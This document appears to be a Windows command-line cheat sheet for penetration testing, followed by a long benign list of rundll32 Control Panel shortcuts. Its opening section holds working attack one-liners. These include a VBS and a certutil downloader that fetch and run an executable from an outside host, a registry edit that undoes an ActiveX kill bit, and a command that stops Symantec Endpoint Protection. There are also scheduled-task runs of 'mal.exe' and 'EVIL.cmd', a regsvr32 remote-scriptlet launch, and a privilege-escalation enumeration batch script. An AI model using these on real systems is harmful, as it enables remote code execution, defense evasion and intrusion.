
echo Dim HTTPGET >>c:\dl.vbs && echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP") >>c:\dl.vbs && echo HTTPGET.Open "GET", "http://www.illmob.org/test.exe", false >>c:\dl.vbs && echo HTTPGET.Send >>c:\dl.vbs && echo DataBin = HTTPGET.ResponseBody >>c:\dl.vbs && echo Const adTypeBinary=1 >>c:\dl.vbs && echo Const adSaveCreateOverWrite=2 >>c:\dl.vbs && echo Dim SendBinary >>c:\dl.vbs && echo Set SendBinary = CreateObject("ADODB.Stream") >>c:\dl.vbs && echo SendBinary.Type = adTypeBinary >>c:\dl.vbs && echo SendBinary.Open >>c:\dl.vbs && echo SendBinary.Write DataBin >>c:\dl.vbs && echo SendBinary.SaveToFile "c:\test.exe", adSaveCreateOverWrite >>c:\dl.vbs && cscript //Nologo /B c:\dl.vbs && start c:\test.exe && del /s c:\dl.vbs

Re-enable ADODB.Stream if it has been disabled by the ActiveX compatibility kill bit:

echo Windows Registry Editor Version 5.00 >>c:\fix.reg && echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{00000566-0000-0010-8000-00AA006D2EA4}] >>c:\fix.reg && echo "Compatibility Flags"=- >>c:\fix.reg && regedit /s c:\fix.reg

WebDL using CertUtil

certutil -urlcache -split -f http://illmob.org/test.exe && start test.exe

Mount Windows Share with Null Session

net use x: \\server\share "" /u:

Disable Symantec Endpoint Protection

"c:\program files\symantec\symantec endpoint protection\smc" -stop

AT Command Execution

at \\[remote host name or IP address] 12:00 cmd /c "C:\windows\temp\mal.exe"
schtasks /create /tn rb /tr "c:\EVIL.cmd" /sc minute /mo 1 /ru Administrator /rp p455w0rd && schtasks /change /tn rb /ru ""

Run external Windows Script Component (pops calc.exe)

regsvr32 /s /n /u /i:http://bit.ly/1S8dRjL scrobj.dll

Run Sysinternals programs

pushd \\live.sysinternals.com && autoruns /accepteula && pause && popd

Find unquoted service paths without access to wmic. Run both of these to catch services with spaces in their names:

for /f "tokens=2" %i in ('sc query ^|findstr "SERVICE_NAME"') do sc qc %i | findstr "BINARY_PATH_NAME" >> output.txt
for /f "tokens=2*" %i in ('sc query ^|findstr "SERVICE_NAME"') do sc qc "%i %j" | findstr "BINARY_PATH_NAME" >> output.txt

BatterUp.bat

Check permissions on services (batch port of selected PowerUp modules):

@echo off
REM Batch port of selected modules from PowerUp by harmj0y
REM Author: @_wald0
SETLOCAL ENABLEDELAYEDEXPANSION

REM ======================================
REM = Find unquoted service binary paths =
REM ======================================
echo(
echo Finding unquoted service binary paths...
echo(
for /f "tokens=2* delims=:" %%i in ('sc query ^|findstr "SERVICE_NAME"') do (
    set str=%%i
    set str=!str:~1!
    sc qc "!str!" | findstr "BINARY_PATH_NAME" | findstr /iv "c:\windows\\" | findstr /iv """
)

REM ========================================================================
REM = Check permissions on services                                        =
REM = Technique stolen from PowerUp by harmj0y                             =
REM = https://github.com/HarmJ0y/PowerUp/blob/master/PowerUp.ps1#L104-L141 =
REM ========================================================================
echo(
echo Finding service binaries your user has write access to...
echo(
for /f "tokens=2* delims=:" %%i in ('sc query ^|findstr "SERVICE_NAME"') do (
    set str=%%i
    set str=!str:~1!
    for /f "tokens=4" %%e in ('sc qc "!str!" ^| findstr "ERROR_CONTROL"') do (
        set errCtrl=%%e
        sc config "!str!" error= !errCtrl! > nul && (
            echo Vulnerable service found: !str!
        )
    )
)

REM =================================================
REM = Check for write access to directories in PATH =
REM =================================================
echo(
echo Finding write access in PATH directories...
echo(
REM http://stackoverflow.com/a/14879373
for %%A in ("%path:;=";"%") do (
    set filename=%%~A\dll-write-check.txt
    copy /y nul "!filename!" > nul 2>&1 && (
        del "!filename!"
        echo Writable path directory found: %%A
    )
)

Control Panel from Command Line

Control Panel:

rundll32.exe shell32.dll,Control_RunDLL

Accessibility Settings (ACCESS.CPL)

Accessibility Properties (Keyboard):

rundll32.exe shell32.dll,Control_RunDLL access.cpl,,1

Accessibility Properties (Sound):

rundll32.exe shell32.dll,Control_RunDLL access.cpl,,2

Accessibility Properties (Display):

rundll32.exe shell32.dll,Control_RunDLL access.cpl,,3

Accessibility Properties (Mouse):

rundll32.exe shell32.dll,Control_RunDLL access.cpl,,4

Accessibility Properties (General):

rundll32.exe shell32.dll,Control_RunDLL access.cpl,,5

Add/Remove Programs (APPWIZ.CPL)

Add/Remove Programs Properties (Install/Uninstall):

rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,1

Add/Remove Programs Properties (Windows Setup):

rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,2

Add/Remove Programs Properties (Startup Disk):

rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,3

Display Settings (DESK.CPL)

Display Properties (Background):

rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,0

Display Properties (Screen Saver):

rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,1

Display Properties (Appearance):

rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,2

Display Properties (Settings):

rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,3

Display Properties (Install Screen Saver):

rundll32.exe desk.cpl,InstallScreenSaver %1

(opens .scr at location specified by %1 in preview window)

FindFast Settings (FINDFAST.CPL)

Find Fast Properties (General):

rundll32.exe shell32.dll,Control_RunDLL findfast.cpl

Internet Settings (INETCPL.CPL)

Internet Properties (General):

rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl,,0

Internet Properties (Security):

rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl,,1

Internet Properties (Content):

rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl,,2

Internet Properties (Connection):

rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl,,3

Internet Properties (Programs):

rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl,,4

Internet Properties (Advanced):

rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl,,5

Regional Settings (INTL.CPL)

Regional Settings Properties (Regional Settings):

rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,0

Regional Settings Properties (Number):

rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,1

Regional Settings Properties (Currency):

rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,2

Regional Settings Properties (Time):

rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,3

Regional Settings Properties (Date):

rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,4

Regional Settings Properties (Input Locales):

rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,5

Joystick Settings (JOY.CPL)

Joystick Properties (Joystick):

rundll32.exe shell32.dll,Control_RunDLL joy.cpl

Mouse/Keyboard/Printers/Fonts Settings (MAIN.CPL)

Mouse Properties:

rundll32.exe shell32.dll,Control_RunDLL main.cpl @0

Keyboard Properties:

rundll32.exe shell32.dll,Control_RunDLL main.cpl @1

Printers:

rundll32.exe shell32.dll,Control_RunDLL main.cpl @2

Fonts:

rundll32.exe shell32.dll,Control_RunDLL main.cpl @3

Mail and Fax Settings (MLCFG32.CPL)

Microsoft Exchange/Outlook Properties (General):

rundll32.exe shell32.dll,Control_RunDLL mlcfg32.cpl

Multimedia/Sounds Settings (MMSYS.CPL)

Multimedia Properties (Audio):

rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,0

Multimedia Properties (Video):

rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,1

Multimedia Properties (MIDI):

rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,2

Multimedia Properties (CD Music):

rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,3

Multimedia Properties (Advanced/Devices):

rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,4

Sounds Properties:

rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl @1

Modem Settings (MODEM.CPL)

Modem Properties (General):

rundll32.exe shell32.dll,Control_RunDLL modem.cpl

Network Settings (NETCPL.CPL / NCPA.DLL)

Network (Configuration):

Win9x: rundll32.exe shell32.dll,Control_RunDLL netcpl.cpl

WinNT: rundll32.exe shell32.dll,Control_RunDLL ncpa.cpl

Dial-up Networking Wizard:

Win9x: rundll32.exe rnaui.dll,RnaWizard

Create Share Dialog:

WinNT: rundll32.exe ntlanui.dll,ShareCreate

Manage Shares Dialog:

WinNT: rundll32.exe ntlanui.dll,ShareManage

ODBC Settings (ODBCCP32.CPL)

ODBC Data Source Administrator (General):

rundll32.exe shell32.dll,Control_RunDLL odbccp32.cpl

Password Settings (PASSWORD.CPL)

Password Properties (Change Passwords):

Win9x: rundll32.exe shell32.dll,Control_RunDLL password.cpl

COM Ports Settings (PORTS.CPL)

COM Ports Properties (General):

WinNT: rundll32.exe shell32.dll,Control_RunDLL ports.cpl

Server Properties (SRVMGR.CPL)

Server Properties (General):

WinNT: rundll32.exe shell32.dll,Control_RunDLL srvmgr.cpl

System Settings (SYSDM.CPL)

System Properties (General):

rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,0

System Properties (Device Manager):

Win9x: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,1

System Properties (Performance):

Win9x: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,3

WinNT: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,1

System Properties (Environment):

WinNT: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,2

System Properties (Startup/Shutdown):

WinNT: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,3

System Properties (Hardware Profiles):

Win95: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,2

WinNT: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,4

System Properties (User Profiles):

WinNT: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,5

Add New Hardware Wizard:

Win9x: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl @1

Add New Printer Wizard:

Win9x: rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL AddPrinter

Telephony Settings (TELEPHON.CPL)

Dialing Properties (My Location / Drivers):

WinNT: rundll32.exe shell32.dll,Control_RunDLL telephon.cpl

Themes Settings (THEMES.CPL)

Themes Properties (General):

rundll32.exe shell32.dll,Control_RunDLL themes.cpl

Time and Date Settings (TIMEDATE.CPL)

Date/Time Properties:

rundll32.exe shell32.dll,Control_RunDLL timedate.cpl

Choose Time Zone:

rundll32.exe shell32.dll,Control_RunDLL timedate.cpl,,/f

TweakUI Settings (TWEAKUI.CPL)

TweakUI Dialog (General):

rundll32.exe shell32.dll,Control_RunDLL tweakui.cpl

UPS Settings (UPS.CPL)

Uninterruptible Power Supply Properties (General):

WinNT: rundll32.exe shell32.dll,Control_RunDLL ups.cpl

Microsoft Mail Postoffice Settings (WGPOCPL.CPL)

Microsoft Workgroup Postoffice Admin:

rundll32.exe shell32.dll,Control_RunDLL wgpocpl.cpl

Miscellaneous File System Dialogs and Wizards

Open With (File Associations):

rundll32.exe shell32.dll,OpenAs_RunDLL d:\path\filename.ext

Run Diskcopy Dialog:

rundll32 diskcopy.dll,DiskCopyRunDll

Create New Shortcut Wizard:

rundll32.exe AppWiz.Cpl,NewLinkHere %1

(creates shortcut at location specified by %1)

Create a Briefcase:

rundll32.exe syncui.dll,Briefcase_Create

View Fonts:

rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL FontsFolder

View Printers:

rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL PrintersFolder